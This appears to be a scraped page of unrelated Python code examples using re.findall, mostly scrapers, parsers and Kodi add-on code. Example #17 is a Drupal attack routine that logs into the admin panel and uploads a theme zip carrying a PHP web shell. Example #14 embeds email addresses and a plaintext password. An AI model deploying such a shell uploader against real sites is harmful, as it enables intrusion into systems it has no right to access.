def DownloadUpdate(self, file):
		self.log('Downloading: %s' % file)
		dirfile = os.path.join(self.UpdateTempDir,file)
		dirname, filename = os.path.split(dirfile)
		if not os.path.isdir(dirname):
			try:
				os.makedirs(dirname)
			except:
				self.log('Error creating directory: '  +dirname)
		url = self.SVNPathAddress+urllib.quote(file)
		try:
			if re.findall(".xbt",url):
				self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0])
				urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8"))
			else: urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8") )
			self.DownloadedFiles.append(urllib.unquote(url))
			return 1
		except:
			try:
				time.sleep(2)
				if re.findall(".xbt",url):
					self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0])
					urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
				else: urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8") )
				urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
				self.DownloadedFiles.append(urllib.unquote(url))
				return 1
			except:
				self.log("Download failed: %s" % url)
				self.DownloadFailedFiles.append(urllib.unquote(url))
				return 0
Example #2
0
def ident_author(name, pp=prompt_possibles):
    orig_name = name
    name = ''.join(re.findall('[A-Z0-9]+',name.upper()))
    best_authors = []
    with open('sample_data/author_names.json', 'r') as f:
        j = json.load(f)
        for b in j['results']['bindings']:
            author_orig = b['name']['value']
            uri = b['author']['value']
            author = b['name']['value'].upper()
            subnames = author_orig.split()
            author = ''.join(re.findall('[A-Z0-9]+',author))
            dist = jaccard_ngram_dist(name,author,3)
            best_authors.append(((author_orig,uri),dist))
            if len(subnames)>=2:
                for sname in [subnames[0], subnames[-1]]:
                    sname = ''.join(re.findall('[A-Z0-9]+',sname))
                    dist = jaccard_ngram_dist(name,sname,3)
                    best_authors.append(((author_orig,uri),dist))
            if len(best_authors)>20:
                best_authors.sort(key=lambda x:x[1])
                best_authors = best_authors[:5]
    best_authors.sort(key=lambda x:x[1])
    best_authors = best_authors[:5]
    best_dist = best_authors[0][1]
    possibles = [best_authors[0][0]]
    for author, dist in best_authors[1:]:
        percent_diff = (dist-best_dist)*2/float(dist+best_dist)
        if percent_diff < __CUTOFF__:
            possibles.append(author)
    if len(possibles)>1:
        identified = pp(orig_name, possibles)
    else:
        identified = possibles[0]
    return identified
def wigle_print(username, password, netid):
    browser = mechanize.Browser()

    browser.open('http://wigle.net')
    reqData = urllib.urlencode({'credential_0': username,
                                'credential_1': password})

    browser.open('https://wigle.net//gps/gps/main/login', reqData)

    params = {}
    params['netid'] = netid
    reqParams = urllib.urlencode(params)
    respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
    resp = browser.open(respURL, reqParams).read()

    mapLat = 'N/A'
    mapLon = 'N/A'
    rLat = re.findall(r'maplat=.*\&', resp)

    if rLat:
        mapLat = rLat[0].split('&')[0].split('=')[1]
        rLon = re.findall(r'maplon=.*\&', resp)

    if rLon:
        mapLon = rLon[0].split

    print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon
Example #4
0
def parse_log(log_file):
    with open(log_file, 'r') as log_file2:
        log = log_file2.read()

    loss_pattern = r"Iteration (?P<iter_num>\d+), loss = (?P<loss_val>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    losses = []
    loss_iterations = []

    fileName= os.path.basename(log_file)
    for r in re.findall(loss_pattern, log):
        loss_iterations.append(int(r[0]))
        losses.append(float(r[1]))

    loss_iterations = np.array(loss_iterations)
    losses = np.array(losses)

    accuracy_pattern = r"Iteration (?P<iter_num>\d+), Testing net \(#0\)\n.* accuracy = (?P<accuracy>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    accuracies = []
    accuracy_iterations = []
    accuracies_iteration_checkpoints_ind = []

    for r in re.findall(accuracy_pattern, log):
        iteration = int(r[0])
        accuracy = float(r[1]) * 100

        if iteration % 10000 == 0 and iteration > 0:
            accuracies_iteration_checkpoints_ind.append(len(accuracy_iterations))

        accuracy_iterations.append(iteration)
        accuracies.append(accuracy)

    accuracy_iterations = np.array(accuracy_iterations)
    accuracies = np.array(accuracies)
	
    return loss_iterations, losses, accuracy_iterations, accuracies, accuracies_iteration_checkpoints_ind, fileName
Example #5
0
def getCategoryUrl(site="",url=""):
    catDb = openTable(tableName=global_setting['catTable'])
    r = session.get(url)
    if not r.text:
        return False

    soup = BeautifulSoup(r.text)
    for level1 in soup.select('.classify_books'):
        curLevel1 = level1.select('.classify_title')[0].text
        curLevel1 = re.sub('\s', '', curLevel1)
        for level2 in level1.select('.classify_kind'):
            curLevel2 = level2.select('.classify_kind_name')[0].text
            curLevel2 = re.sub('\s', '', curLevel2)
            for level3 in level2.select('ul li a'):
                #curLevel3 = re.sub('\s', '', level3.text)
                curLevel3 =  level3.text.strip()
                curlUrl = level3['href']
                retFind = re.findall(r'\/cp(.*)\.html',curlUrl)
                if retFind:
                    curCatID = retFind[0]
                    catType = 'book'
                else:
                    retFind = re.findall(r'\/cid(.*)\.html',curlUrl)
                    if retFind:
                        curCatID = retFind[0]
                        catType = 'nonbook'
                if retFind:
                    if catDb.find({'catId':curCatID}).count() >0:
                        logger.debug('catetogy %s exists,skip\n'%(curCatID))
                    else:
                        catDb.insert({'catId':curCatID,'level1':curLevel1, 'level2':curLevel2, 'level3':curLevel3, 'catUrl':curlUrl,'catType':catType, 'site':site})
    return True
def __load_testdata(file):
   """
   Reads the testdata out of a file.  Testdata consists of exactly three 
   strings on each line, each one enclosed in quotation marks (" or ').  
   The first is the filename to be parsed, the second is the series name
   that should be parsed out of it, and the third is the issue number string
   that should be parsed out of it.
   
   Blank lines and lines that begin with # are ignored.
   """
   retval = []
   if File.Exists(file): 
      with StreamReader(file, Encoding.UTF8, False) as sr:
         line = sr.ReadLine()
         while line is not None:
            line = line.strip()
            if len(line) > 0 and not line.startswith("#"):
               if line.startswith('"'):
                  data = re.findall(r'"(.*?)"', line)
               else:
                  data = re.findall(r"'(.*?)'", line)
               if len(data) == 3:
                  data.append("")
               if len(data) != 4:
                  raise Exception("badly formatted test data");
               retval.append( data ) 
            line = sr.ReadLine()
   return retval
Example #7
0
    def __search(self, titles, year, season='0'):
        try:
            query = self.search_link % (urllib.quote_plus(titles[0]))
            query = urlparse.urljoin(self.base_link, query)

            t = [cleantitle.get(i) for i in set(titles) if i]
            y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']

            r = client.request(query)

            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'list_movies'})
            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'item_movie'})
            r = dom_parser.parse_dom(r, 'h2', attrs={'class': 'tit'})
            r = dom_parser.parse_dom(r, 'a', req='href')
            r = [(i.attrs['href'], i.content.lower()) for i in r if i]
            r = [(i[0], i[1], re.findall('(.+?) \(*(\d{4})', i[1])) for i in r]
            r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r]
            r = [(i[0], i[1], i[2], re.findall('(.+?)\s+(?:\s*-?\s*(?:season|s))\s*(\d+)', i[1])) for i in r]
            r = [(i[0], i[3][0][0] if len(i[3]) > 0 else i[1], i[2], i[3][0][1] if len(i[3]) > 0 else '0') for i in r]
            r = [(i[0], i[1], i[2], '1' if int(season) > 0 and i[3] == '0' else i[3]) for i in r]
            r = sorted(r, key=lambda i: int(i[2]), reverse=True)  # with year > no year
            r = [i[0] for i in r if cleantitle.get(i[1]) in t and i[2] in y and int(i[3]) == int(season)][0]

            return source_utils.strip_domain(r)
        except:
            return
Example #8
0
 def extractSrcFileData(self, path):
     fileinput.close()
     isLocListener = False
     wakeLockAcqRegex = "invoke-virtual(.*?)Landroid/os/PowerManager$WakeLock;->acquire()"
     domRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/DocumentBuilderFactory;->newDocumentBuilder()"
     saxRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/SAXParserFactory;->newSAXParser()"
     xmlppRegex = "invoke-static(.*?)Landroid/util/Xml;->newPullParser()"
     for line in fileinput.input([path]):
         matches = re.findall(wakeLockAcqRegex, line)
         if len(matches) > 0:
             self.numNoTimeoutWakeLocks = self.numNoTimeoutWakeLocks + 1
         if line.startswith(".implements Landroid/location/LocationListener;"):
             self.numLocListeners = self.numLocListeners + 1
             isLocListener = True
         if isLocListener:
             if "\"gps\"" in line:
                 self.numGpsUses = self. numGpsUses + 1
         matches = re.findall(domRegex, line)
         if len(matches) > 0:
             self.numDomParser = self.numDomParser + 1
         matches = re.findall(saxRegex, line)
         if len(matches) > 0:
             self.numSaxParser = self.numSaxParser + 1
         matches = re.findall(xmlppRegex, line)
         if len(matches) > 0:
             self.numXMLPullParser = self.numXMLPullParser + 1
Example #9
0
def ReadProtonCounts(inchi):
    import re

    #Get inchi layers
    layers = inchi.split('/')
    ProtLayer = ''
    FixedLayer = ''
    for l in layers[1:]:
        if 'C' in l and 'H' in l:
            atoms = re.findall(r"[a-zA-Z]+", l)
            indexes = [int(x) for x in re.findall(r"\d+", l)]
            formula = [list(x) for x in zip(atoms, indexes)]
        if 'h' in l and ProtLayer != '':
            FixedLayer = l[1:]
        if 'h' in l and ProtLayer == '':
            ProtLayer = l[1:]

    #initialize proton list
    nheavy = sum([x[1] for x in formula if x[0] != 'H'])

    #Find, save and remove tautomeric portions from main proton layer
    tautomerics = re.findall(r"\(.*?\)", ProtLayer)
    ProtLayer = re.sub(r"\(.*?\)", "", ProtLayer)
    if ProtLayer[-1] == ',':
        ProtLayer = ProtLayer[:-1]

    #Read the main and the fixed proton layer
    protons = ReadPSections(ProtLayer, nheavy)
    fprotons = ReadPSections(FixedLayer, nheavy)

    return protons, formula, tautomerics, fprotons
Example #10
0
    def _real_extract(self, url):
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)

        title = self._html_search_meta('title', webpage, 'title', fatal=True)
        TITLE_SUFFIX = ' - TeacherTube'
        if title.endswith(TITLE_SUFFIX):
            title = title[:-len(TITLE_SUFFIX)].strip()

        description = self._html_search_meta('description', webpage, 'description')
        if description:
            description = description.strip()

        quality = qualities(['mp3', 'flv', 'mp4'])

        media_urls = re.findall(r'data-contenturl="([^"]+)"', webpage)
        media_urls.extend(re.findall(r'var\s+filePath\s*=\s*"([^"]+)"', webpage))
        media_urls.extend(re.findall(r'\'file\'\s*:\s*["\']([^"\']+)["\'],', webpage))

        formats = [
            {
                'url': media_url,
                'quality': quality(determine_ext(media_url))
            } for media_url in set(media_urls)
        ]

        self._sort_formats(formats)

        return {
            'id': video_id,
            'title': title,
            'thumbnail': self._html_search_regex(r'\'image\'\s*:\s*["\']([^"\']+)["\']', webpage, 'thumbnail'),
            'formats': formats,
            'description': description,
        }
Example #11
0
 def evalAtom(self, atom, param_names):
     if atom in self.consts:
         return '(const _%s)'%atom
     elif atom in param_names:
         return '(param (paramref \"%s\"))'%atom
     elif re.match(r'^\d+$', atom):
         return '(const (intc %s))'%atom
     elif atom.lower() in ['true', 'false']:
         return '(const (boolc %s))'%atom.lower()
     elif re.match(r'^forall.*end$', atom) or re.match(r'^exists.*?end$', atom):
         if re.match(r'^forall.*end$', atom):
             params, text = re.findall(r'forall(.*?)do(.*)end', atom)[0]
         else:
             params, text = re.findall(r'exists(.*?)do(.*)end', atom)[0]
         param_name_dict, param_defs = analyzeParams(params)
         for p in param_names:
             if p not in param_name_dict: param_name_dict[p] = 0
         text = self.splitText(text)
         sub_form = self.evaluate(self.process(text), param_name_dict)
         if re.match(r'^forall.*?end$', atom):
             return '(forallFormula %s %s)'%(param_defs, sub_form)
         else:
             return '(existFormula %s %s)'%(param_defs, sub_form)
     else:
         return '(var %s)'%self.evalVar(atom)
	def showCovers_adddetail_csfd(self, data, title):
		title_s = re.findall('<title>(.*?)\|', data, re.S)
		if title_s:
			if title_s[0] != "Vyhled\xc3\xa1v\xc3\xa1n\xc3\xad ":
				csfd_title = title_s[0]
			else:
				csfd_title = title
			print "EMC csfd: Movie name - %s" % csfd_title
		else:
			csfd_title = title
		bild = re.findall('<img src="(//img.csfd.cz/files/images/film/posters/.*?|//img.csfd.cz/posters/.*?)" alt="poster"', data, re.DOTALL | re.IGNORECASE)
		if bild:
			print "EMC csfd: Cover Select - %s" % title
			self.cover_count = self.cover_count + 1
			csfd_url = "http:" + bild[0].replace('\\','').strip()
			self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
			self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
			bild = re.findall('<h3>Plak.*?ty</h3>(.*?)</table>', data, re.S)
			if bild:
				bild1 = re.findall('style=\"background-image\: url\(\'(.*?)\'\)\;', bild[0], re.DOTALL | re.IGNORECASE)
				if bild1:
					for each in bild1:
						print "EMC csfd: Cover Select - %s" % title
						self.cover_count = self.cover_count + 1
						csfd_url = "http:" + each.replace('\\','').strip()
						self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
						self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
				else:
					print "EMC csfd 3 : no else covers - %s" % title
			else:
				print "EMC csfd 2 : no else covers - %s" % title
		else:
			print "EMC csfd 1 : keine infos gefunden - %s" % title
Example #13
0
def __get_dom_elements(item, name, attrs):
    if not attrs:
        pattern = '(<%s(?:\s[^>]*>|/?>))' % (name)
        this_list = re.findall(pattern, item, re.M | re.S | re.I)
    else:
        last_list = None
        for key, value in attrs.iteritems():
            value_is_regex = isinstance(value, re_type)
            value_is_str = isinstance(value, basestring)
            pattern = '''(<{tag}[^>]*\s{key}=(?P<delim>['"])(.*?)(?P=delim)[^>]*>)'''.format(tag=name, key=key)
            re_list = re.findall(pattern, item, re.M | re. S | re.I)
            if value_is_regex:
                this_list = [r[0] for r in re_list if re.match(value, r[2])]
            else:
                temp_value = [value] if value_is_str else value
                this_list = [r[0] for r in re_list if set(temp_value) <= set(r[2].split(' '))]
                
            if not this_list:
                has_space = (value_is_regex and ' ' in value.pattern) or (value_is_str and ' ' in value)
                if not has_space:
                    pattern = '''(<{tag}[^>]*\s{key}=((?:[^\s>]|/>)*)[^>]*>)'''.format(tag=name, key=key)
                    re_list = re.findall(pattern, item, re.M | re. S | re.I)
                    if value_is_regex:
                        this_list = [r[0] for r in re_list if re.match(value, r[1])]
                    else:
                        this_list = [r[0] for r in re_list if value == r[1]]
    
            if last_list is None:
                last_list = this_list
            else:
                last_list = [item for item in this_list if item in last_list]
        this_list = last_list
    
    return this_list
Example #14
0
def weatherReport():
	htmlfile = urllib.urlopen('http://www.weather.com/weather/today/Mahomet+IL+61853:4:US')
	htmltext = htmlfile.read()

	rnTemp =  '<span itemprop="temperature-fahrenheit">(.+?)</span>'
	conditions = '<div class="wx-phrase ">(.+?)</div>'
	tonightTemp = '<div class="wx-temperature">(.+?)</div>'

	rntPattern = re.compile(rnTemp)
	conditionsPattern = re.compile(conditions)
	tonightTempPattern = re.compile(tonightTemp)


	rntInstance = re.findall(rntPattern, htmltext)
	conditionsInstance = re.findall(conditionsPattern, htmltext)
	tonightTempInstance = re.findall(tonightTempPattern, htmltext)

	
	currentConditions = conditionsInstance[0]
	tonightConditions = conditionsInstance[2]
	currentTemp  = rntInstance[0]
	tonightTemp = tonightTempInstance[2][:2]
	print currentTemp

	to = ['colts8729@gmail.com', 'lisa@selig.com']
	sender = 'weather.bot1'
	subject = 'Your Daily Weather Forecast is Here'
	bodymsg = "Right now: " + currentTemp +' degrees.' + '  '  + currentConditions + '.' + "\n"  +"Tonight: "  + \
			   tonightTemp + ' degrees.' + '  ' + tonightConditions + '.\n\n' + "Read more about today's weather here: "\
			   "http://www.weather.com/weather/today/Mahomet+IL+61853:4:US" + "\n"  + "This message was mad by request via WeatherBot.\nHave a great day."

	for address in to:
		createMessage(address, 'weather.bot1@gmail.com', 'skytower', subject, bodymsg)

	return
    def get_episode(self,url):
        html = self.fetch_url(url)
        divs = re.findall(r'<div id="fenji_\d+_(asc|\d+)"(.*?)<\/div>', html) 
        result = []
        if divs:
            for div in divs:
                #                              链接                                   第N集                 小标题
                r = re.findall(r'<h3><a href="(.*?)" target="_blank" title=".*?">.*?(第\d+集)<\/a></h3><h4>(.+?)</h4>', div[1])

                if r:     #电视剧
                    for ep_data in r:
                        result.append({"title":ep_data[1] + " " + ep_data[2],
                                        "img":"",
                                        "url":ep_data[0]})
                                        
                else: 
                    
                    #                             链接                          标题   小标题            期数(日期)
                    r = re.findall(r'<h3><a href="(.*?)" target="_blank" title="(.*?)">(.*?)<\/a></h3><h4>(.+?)期</h4>', div[1])
                    if r:  #综艺
                        for ep_data in r:
                            dateA = ep_data[3].split("-")
                            date = ""
                            if len(dateA) == 3:  #2012-08-12
                                date = "%s.%s.%s" % (dateA[2],dateA[1],dateA[0])
                            result.append({"title":ep_data[1] + " " + ep_data[2],
                                        "img":"",
                                        "url":ep_data[0],
                                        "date":date})
        return result           
             
#aa = IkankanResolver("http://data.movie.kankan.com/movie/38534?id=731018")
def parse_current_docket(docket_record):
    # grab the file with the URL mangled slightly to grab 100k records
    docket_file = urllib2.urlopen(docket_record['url'] + "&ctl00_ctl00_cphContentMain_MainContent_gvCommentListChangePage=1_100000").read()
    page = pq(etree.fromstring(docket_file, parser))

    docket = dict(docket_record)

    docket['title'] = page('.dyn_wrap h1').text().strip()
    assert docket['title'], 'no title found'

    headers = [item.text().strip() for item in page('.rgMasterTable thead th').items()]

    docket['comments'] = []

    # check if there's a no-records message
    if len(page('.rgMasterTable .rgNoRecords')):
        return docket
    
    for row in page('.rgMasterTable tbody tr').items():
        tds = row.find('td')
        cell_text = [item.text().strip() for item in tds.items()]
        cdata = dict(zip(headers, cell_text))
        
        link = pq(tds[-1]).find('a')

        doc = {
            'url': urlparse.urljoin(docket['url'], link.attr('href')),
            'details': {},
            'release': [fix_spaces(cdata['Release'])],
            'date': cdata['Date Received'],
            'doctype': 'public_submission',
        }

        vc_matches = re.findall(r"ViewComment\.aspx\?id=(\d+)", doc['url'])
        if vc_matches:
            doc['id'] = vc_matches[0]
            doc['subtype'] = 'comment'
            detail_columns = ['Organization', 'First Name', 'Last Name']
        else:
            ep_matches = re.findall(r"ViewExParte\.aspx\?id=(\d+)", doc['url'])
            if ep_matches:
                doc['id'] = "EP-%s" % ep_matches[0]
                doc['subtype'] = 'exparte'
                detail_columns = ['Organization']
            else:
                assert False, "expected either comment or exparte link: %s" % doc['url']

        for rdg_label, cftc_label in (('Organization Name', 'Organization'), ('First Name', 'First Name'), ('Last Name', 'Last Name')):
            if cftc_label in detail_columns and cdata[cftc_label]:
                doc['details'][rdg_label] = cdata[cftc_label]

        docket['comments'].append(doc)

    assert len(docket['comments']) < 100000, "we probably exceeded one page"

    # then strip out all the ones that aren't about this document
    release = fix_spaces(page('a[id*=rptReleases_hlReleaseLink]').text().strip())
    docket['comments'] = [comment for comment in docket['comments'] if comment['release'][0] == release]

    return docket
Example #17
0
File: cace.py Project: dsrbr/cace
def drupal_upload(url, login, pwd):
  print '[*] Trying to install theme with shell.'
  dpl_sess = drupal_admin(url, login, pwd)
  info = 'name = '+globals.SHELL_NAME+'\ndescription = '+globals.SHELL_NAME+'\npackage = public-action\nversion = VERSION\ncore = 7.x\nfiles[] = '+globals.SHELL_EXT
  page = dpl_sess.get(url+"?q=admin/appearance/install")
  token1 = re.findall('<input type="hidden" name="form_build_id" value="(.*?)" />',page.text)
  token2 = re.findall('<input type="hidden" name="form_token" value="(.*?)" />',page.text)
  if (token1 == []) or (token2 == []):
    print '[-] Failed to get token. Login or password incorrect or not supported Drupal version.'
    sys.exit()
  post = {'form_build_id' : str(token1[0]),
          'form_token' : str(token2[0]),
          'form_id' : 'update_manager_install_form',
          'op' : 'Install'}
  print '[*] Creating %s.zip in current folder.' % (globals.SHELL_NAME)
  arch = zipfile.ZipFile(globals.SHELL_NAME+".zip", 'w')
  arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_EXT, globals.PHP_EXEC)
  arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_NAME+".info",info)
  arch.close()
  file = {'files[project_upload]' : (globals.SHELL_NAME+".zip",open(globals.SHELL_NAME+".zip",'rb'),'application/zip')}
  print '[*] Trying to upload zip file.'
  up = dpl_sess.post(url+"?q=admin/appearance/install",files=file,data=post,timeout=None)
  get_link = re.findall('URL=(.*?)" />',up.text)
  if not get_link:
    print '[-] Failed to upload zip file. Try one more time.'
    sys.exit()
  link = str(get_link[0]).replace('&amp;','&')
  dpl_sess.get(link)
  shell = url+"sites/all/themes/"+globals.SHELL_NAME+"/"+globals.SHELL_EXT
  check = dpl_sess.get(shell)
  if check.status_code == 200:
    return shell
  else:
    print '[-] Themes or tmp directories is not writable.'
    sys.exit()
Example #18
0
    def getCssLinks(self):
        """获取css文件中的链接(一般主要有图片和其他css文件)"""
        f = open(self.file)
        css = f.read()
        f.close()

        def getNewLink(cl):
            up = urlparse(self.url)
            if (not up.path) or ('../' not in cl):
                return cl

            cs = cl.count('../')+1
            newlink = up.scheme+'://'+up.netloc+'/'.join(up.path.split('/')[:-cs])
            newlink = re.sub(r'(\.\./)+', newlink+'/', cl)
            return newlink

        # 图片链接
        picLinks = re.findall(r'background:\s*url\s*\([\'\"]?([a-zA-Z0-9/\._-]+)[\'\"]?\)', css, re.I)
        # 其他css链接
        cssLinks = re.findall(r'@import\s*[\'\"]*([a-zA-Z0-9/\._-]+)[\'\"]*', css, re.I)
        Links = picLinks + cssLinks
        cLinks = []
        for cl in Links:
            cLinks.append(getNewLink(cl))

        return cLinks
Example #19
0
 def test_list(self):
     # list apps and get their names
     child = pexpect.spawn("{} apps".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps_before = re.findall(r'([-_\w]+) {\w?}', child.before)
     # create a new app
     self.assertIsNotNone(self.formation)
     child = pexpect.spawn("{} apps:create --formation={}".format(
         DEIS, self.formation))
     child.expect('done, created ([-_\w]+)')
     app = child.match.group(1)
     child.expect(pexpect.EOF)
     # list apps and get their names
     child = pexpect.spawn("{} apps".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps = re.findall(r'([-_\w]+) {\w?}', child.before)
     # test that the set of names contains the previous set
     self.assertLess(set(apps_before), set(apps))
     # delete the app
     child = pexpect.spawn("{} apps:destroy --app={} --confirm={}".format(
         DEIS, app, app))
     child.expect('done in ', timeout=5 * 60)
     child.expect(pexpect.EOF)
     # list apps and get their names
     child = pexpect.spawn("{} apps:list".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps = re.findall(r'([-_\w]+) {\w?}', child.before)
     # test that the set of names is equal to the original set
     self.assertEqual(set(apps_before), set(apps))
Example #20
0
File: system.py Project: MrW24/wbot
def memory(inp):
    """memory -- Displays the bot's current memory usage."""
    if os.name == "posix":
        # get process info
        status_file = open('/proc/self/status').read()
        s = dict(re.findall(r'^(\w+):\s*(.*)\s*$', status_file, re.M))
        # get the data we need and process it
        data = s['VmRSS'], s['VmSize'], s['VmPeak'], s['VmStk'], s['VmData']
        data = [float(i.replace(' kB', '')) for i in data]
        strings = [convert_kilobytes(i) for i in data]
        # prepare the output
        out = "Threads: \x02{}\x02, Real Memory: \x02{}\x02, Allocated Memory: \x02{}\x02, Peak " \
              "Allocated Memory: \x02{}\x02, Stack Size: \x02{}\x02, Heap " \
              "Size: \x02{}\x02".format(s['Threads'], strings[0], strings[1], strings[2],
              strings[3], strings[4])
        # return output
        return out

    elif os.name == "nt":
        cmd = 'tasklist /FI "PID eq %s" /FO CSV /NH' % os.getpid()
        out = os.popen(cmd).read()
        memory = 0
        for amount in re.findall(r'([,0-9]+) K', out):
            memory += float(amount.replace(',', ''))
        memory = convert_kilobytes(memory)
        return "Memory Usage: \x02{}\x02".format(memory)

    else:
        return "Sorry, this command is not supported on your OS."
Example #21
0
def parse_cpu_time(time):
    #return number of micro second
    # time may be '12m53s', or '0.01s'
    hour_match = re.findall(r'\d+h', time)
    minute_match = re.findall(r'\d+m', time)
    sec_match = re.findall(r'[0-9]+\.*[0-9]*s', time)

    if len(hour_match) == 0:
        hour = 0
    else:
        hour = int(hour_match[0][:-1])

    if len(minute_match) == 0:
        minute = 0
    else:
        minute = int(minute_match[0][:-1])

    if len(sec_match) == 0:
        sec = 0
    else:
        sec = float(sec_match[0][:-1])

    # Return time in unit of ms (microsecond)
    time_ret = int((sec + (minute * 60) + (hour * 3600)) * 1000)
    return time_ret
Example #22
0
def compile_formula(formula, verbose=False):
    """Compile formula into a function. Also return letters found, as a str,
    in same order as parms of function. The first digit of a multi-digit 
    number can't be 0. So if YOU is a word in the formula, and the function
    is called with Y eqal to 0, the function should return False."""

    # modify the code in this function.

    letters = ''.join(set(re.findall('[A-Z]', formula)))
    print letters
    first_letters = set(re.findall('([A-Z])[A-Z]', formula))
    print first_letters
    checklist = ['%s!=0' % (w) for w in first_letters]
    checklist.append('1==1')
    print checklist
    check = ' and '.join(checklist)
    print check
    parms = ', '.join(letters)
    print parms
    tokens = map(compile_word, re.split('([A-Z]+)', formula))
    print tokens
    body = ''.join(tokens)
    print body
    f = 'lambda %s: %s and (%s)' % (parms, body, check)
    if verbose: print f
    return eval(f), letters
Example #23
0
def _strip_and_unquote_list( keys, value ):
    if value[0] == '"':
        # double-quoted values
        m = _DQV.match( value )
        if m:
            value = m.groups()[0]
        values = re.findall( _DQ_L_VALUE, value )
    elif value[0] == "'":
        # single-quoted values
        m = _SQV.match( value )
        if m:
            value = m.groups()[0]

        values = re.findall( _SQ_L_VALUE, value )
    else:
        # unquoted values
        # (may contain internal quoted strings with list delimiters inside 'em!)
        m = _DQV.match( value )
        if m:
            value = m.groups()[0]
        else:
            n = _SQV.match( value )
            if n:
                value = n.groups()[0]

        values = list(_unquoted_list_parse( keys, value ))
        # allow trailing commas
        if values[-1] == '':
            values = values[0:-1]

    return values
Example #24
0
def LISTSHOWS(murl,channel,index=False):
    link=main.OPENURL(murl)
    link=link.replace('\r','').replace('\n','').replace('\t','').replace('&nbsp;','')
    match = re.findall('<div class="titleline"><h2 class="forumtitle"><a href="(.+?)">(.+?)</a></h2></div>',link)
    label='TV Shows'
    if not len(match) > 0:
        match = re.findall('<h3 class="threadtitle">.+?<a class=".+?" href="(.+?)" id=".+?">(.+?)</a></h3>', link)
        label = 'Movies'
    dialogWait = xbmcgui.DialogProgress()
    ret = dialogWait.create('Please wait until ' + label + ' Show list is cached.')
    totalLinks = len(match)
    loadedLinks = 0
    remaining_display = label + ' loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
    dialogWait.update(0, '[B]Will load instantly from now on[/B]',remaining_display)
    xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)")
    for url,name in match:
        if "color" in name:
            name=name.replace('<b><font color=red>','[COLOR red]').replace('</font></b>','[/COLOR]')
            name=name.replace('<b><font color="red">','[COLOR red]').replace('</font></b>','[/COLOR]')
        if label == 'Movies':
            main.addDirX(name, MainUrl+url,39,'',searchMeta=True, metaType='Movies')
        else:
            main.addTVInfo(name,MainUrl+url,38,getShowImage(channel,name),'','')
        loadedLinks = loadedLinks + 1
        percent = (loadedLinks * 100)/totalLinks
        remaining_display = label + ' loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
        dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
        if dialogWait.iscanceled(): return False   
    dialogWait.close()
    del dialogWait
    xbmcplugin.setContent(int(sys.argv[1]), label)
    main.VIEWS()
Example #25
0
def summary_up_result(result_file, ignore, row_head, column_mark):
    """
    Use to summary the monitor or other kinds of results. Now it calculates
    the average value for each item in the results. It fits to the records
    that are in matrix form.

    @result_file: files which need to calculate
    @ignore: pattern for the comment in results which need to through away
    @row_head: pattern for the items in row
    @column_mark: pattern for the first line in matrix which used to generate
    the items in column
    Return: A dictionary with the average value of results
    """
    head_flag = False
    result_dict = {}
    column_list = {}
    row_list = []
    fd = open(result_file, "r")
    for eachLine in fd:
        if len(re.findall(ignore, eachLine)) == 0:
            if len(re.findall(column_mark, eachLine)) != 0 and not head_flag:
                column = 0
                _, row, eachLine = re.split(row_head, eachLine)
                for i in re.split("\s+", eachLine):
                    if i:
                        result_dict[i] = {}
                        column_list[column] = i
                        column += 1
                head_flag = True
            elif len(re.findall(column_mark, eachLine)) == 0:
                column = 0
                _, row, eachLine = re.split(row_head, eachLine)
                row_flag = False
                for i in row_list:
                    if row == i:
                        row_flag = True
                if row_flag is False:
                    row_list.append(row)
                    for i in result_dict:
                        result_dict[i][row] = []
                for i in re.split("\s+", eachLine):
                    if i:
                        result_dict[column_list[column]][row].append(i)
                        column += 1
    fd.close()
    # Calculate the average value
    average_list = {}
    for i in column_list:
        average_list[column_list[i]] = {}
        for j in row_list:
            average_list[column_list[i]][j] = {}
            check = result_dict[column_list[i]][j][0]
            if utils_misc.aton(check) or utils_misc.aton(check) == 0.0:
                count = 0
                for k in result_dict[column_list[i]][j]:
                    count += utils_misc.aton(k)
                average_list[column_list[i]][j] = "%.2f" % (count /
                                                            len(result_dict[column_list[i]][j]))

    return average_list
Example #26
0
def LISTEPISODES(tvshowname,url):
    link=main.OPENURL(url)
    link=link.replace('\r','').replace('\n','').replace('\t','').replace('&nbsp;','')
    match = re.findall('<a class=".+?" href="(.+?)" id=".+?">(.+?)</a>',link)
    dialogWait = xbmcgui.DialogProgress()
    ret = dialogWait.create('Please wait until ['+tvshowname+'] Episodes are cached.')
    totalLinks = len(match)
    loadedLinks = 0
    remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
